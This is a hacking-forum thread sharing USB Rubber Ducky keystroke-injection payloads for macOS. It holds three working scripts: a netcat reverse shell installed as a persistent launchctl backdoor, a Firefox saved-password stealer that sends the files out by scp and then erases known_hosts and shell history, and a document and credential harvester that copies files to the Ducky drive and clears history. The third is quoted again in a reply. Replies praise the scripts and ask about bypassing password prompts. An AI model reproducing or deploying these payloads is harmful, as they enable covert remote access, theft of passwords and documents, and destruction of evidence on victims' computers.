Jump to content

[Payload] OSX thread. First reverse shell payload.


Recommended Posts

Hi everyone. I couldn't think of a better way to make a first post than to contribute some content. Here is a very very basic reverse shell ducky script that works on OS X. I've found the OS X payloads to be few and far between and I plan on posting many more of them here. Post yours too!

I changed some stuff to be a little more verbose / easy to follow. Hope you enjoy (it's shockingly simple)

REM title: osx reverse shell - execute in background - minimize terminal - run on startup
DELAY 500
GUI SPACE
DELAY 300
STRING terminal
ENTER
DELAY 600
STRING touch script.sh
ENTER
STRING echo "mkfifo foo" > script.sh
ENTER
STRING echo "nc 192.168.1.19 4444 <foo | /bin/bash 1>foo" >> script.sh
ENTER
STRING chmod +rwx script.sh
ENTER
STRING launchctl submit -l someName -p ~/script.sh
ENTER
STRING ./script.sh&
ENTER
STRING clear
ENTER
GUI m

This simply creates a script with a netcat command that routes a command prompt to the host (192.168.1.19) on port 4444. It adds this script to the launch daemon so that it acts as a backdoor. Note however that because of the way the script is written, it will connect back on login, and not continuously attempt to connect back. It then runs it in background, clears the screen and minimizes.

Enjoy, I will be posting more advanced payloads soon!

-Shark3y

Link to post
Share on other sites

Here is fully 'weaponized' firefox saved credential harvesting ducky-script. I started with firefox, because that's what I use. Other browsers coming soon.

REM title: OSX harvest firefox password files > secure transfer > cover tracks
DELAY 1200
GUI SPACE
DELAY 200
STRING terminal
ENTER
DELAY 1400
STRING cd ~/Library/Application\ Support/
ENTER
STRING scp "$(find . -iname "key3.db")" "$(find . -iname "signons.sqlite")" user@host:~/Directory_to_save_creds/
ENTER
DELAY 900
STRING yes
ENTER
DELAY 600
STRING sshpassword
ENTER
DELAY 1000
STRING rm ~/.ssh/known_hosts
ENTER
DELAY 100
STRING history -c
ENTER
DELAY 100
GUI q
ENTER

I used scp for the file transfer, though you could easily use other methods that may be quicker (no authentication) but this script still executes in about 10 seconds or so.

Also, this script removes the obvious evidence such as known_hosts file, as well as clearing the command history.

On a side note, I used the find command because sometimes the files are in the mozilla folder, and because the profile folder has a random prefix, this way we get what we want no matter what ;) You can increase the speed of the command by using direct pathnames but you lose some functionality.

Enjoy.

Link to post
Share on other sites
  • 2 weeks later...

Here is my next payload. It requires the twin duck firmware. It also implies the sd card is named "DUCKY".

I was playing around with the twin duck firmware and wanted to think of something productive to do while the drive is loading. I came up with stealing all of the *.doc/docx/pdf/odt files inside of ~/Documents/ as well as the firefox saved passwords. My method allows you to steal as many documents as possible UNTIL the drive is ready then whatever you have thus far in the .zip file is sent over to the drive. Maximum speed is what I was going for, since it already takes so damn long for the drive to pop up.

The script will blast out an entire bash line, then minimize the terminal. The ducky drive will pop up, and as soon as it disappears you can remove the drive (it ejects it as soon as the other stuff is done).

REM title: OSX harvest firefox password files / assorted doccuments --> copy to folder on drive named after user name --> cover tracks
DELAY 2000
GUI SPACE
DELAY 300
STRING terminal
ENTER
DELAY 1000
STRING until ls -l /Volumes/DUCKY | grep -q ".*";do find ~/Documents -type f \( -name '*.doc' -o -name '*.docx' -o -name '*.pdf' -o -name '*.odt' \) | sed 's/./\\&/g' | xargs -n1 zip docs_$(whoami)_$(date +"%m-%d-%y"); echo "WAITING FOR DRIVE...";done; echo "MOUNTED... COPYING..."; cp docs_$(whoami)_$(date +"%m-%d-%y").zip /Volumes/DUCKY/; mkdir /Volumes/DUCKY/$(whoami); cd ~/Library/Application\ Support/; cp "$(find . -iname "key3.db")" "$(find . -iname "signons.sqlite")" /Volumes/DUCKY/$(whoami)/; diskutil eject DUCKY; rm docs_$(whoami)_$(date +"%m-%d-%y").zip; history -c; clear; exit;
ENTER
GUI m

I'm working on something much more interesting but I don't want to give too much information until it's done. Just a hint, it's iSight related ;)

I hope someone is enjoying these...

-Shark3y

Link to post
Share on other sites
  • 2 weeks later...
  • 11 months later...

Here is my next payload. It requires the twin duck firmware. It also implies the sd card is named "DUCKY".

I was playing around with the twin duck firmware and wanted to think of something productive to do while the drive is loading. I came up with stealing all of the *.doc/docx/pdf/odt files inside of ~/Documents/ as well as the firefox saved passwords. My method allows you to steal as many documents as possible UNTIL the drive is ready then whatever you have thus far in the .zip file is sent over to the drive. Maximum speed is what I was going for, since it already takes so damn long for the drive to pop up.

The script will blast out an entire bash line, then minimize the terminal. The ducky drive will pop up, and as soon as it disappears you can remove the drive (it ejects it as soon as the other stuff is done).

REM title: OSX harvest firefox password files / assorted doccuments --> copy to folder on drive named after user name --> cover tracks
DELAY 2000
GUI SPACE
DELAY 300
STRING terminal
ENTER
DELAY 1000
STRING until ls -l /Volumes/DUCKY | grep -q ".*";do find ~/Documents -type f \( -name '*.doc' -o -name '*.docx' -o -name '*.pdf' -o -name '*.odt' \) | sed 's/./\\&/g' | xargs -n1 zip docs_$(whoami)_$(date +"%m-%d-%y"); echo "WAITING FOR DRIVE...";done; echo "MOUNTED... COPYING..."; cp docs_$(whoami)_$(date +"%m-%d-%y").zip /Volumes/DUCKY/; mkdir /Volumes/DUCKY/$(whoami); cd ~/Library/Application\ Support/; cp "$(find . -iname "key3.db")" "$(find . -iname "signons.sqlite")" /Volumes/DUCKY/$(whoami)/; diskutil eject DUCKY; rm docs_$(whoami)_$(date +"%m-%d-%y").zip; history -c; clear; exit;
ENTER
GUI m

I'm working on something much more interesting but I don't want to give too much information until it's done. Just a hint, it's iSight related ;)

I hope someone is enjoying these...

-Shark3y

Shark3y... these are amazing! do you have anything else? yours are the only that I can find for os x.

Link to post
Share on other sites
  • 2 months later...

I've seen a chrome harvesting payload on this forum as well where it goes into browser settings, shows passwords, copy and pastes them to a notepad file and then to the ducky, However on OSX when you click 'show passwords' you are required to enter the account password as authentication to proceed. Does ducky get around this or does it stop it in its cute little webbed tracks?

Link to post
Share on other sites
  • 5 months later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...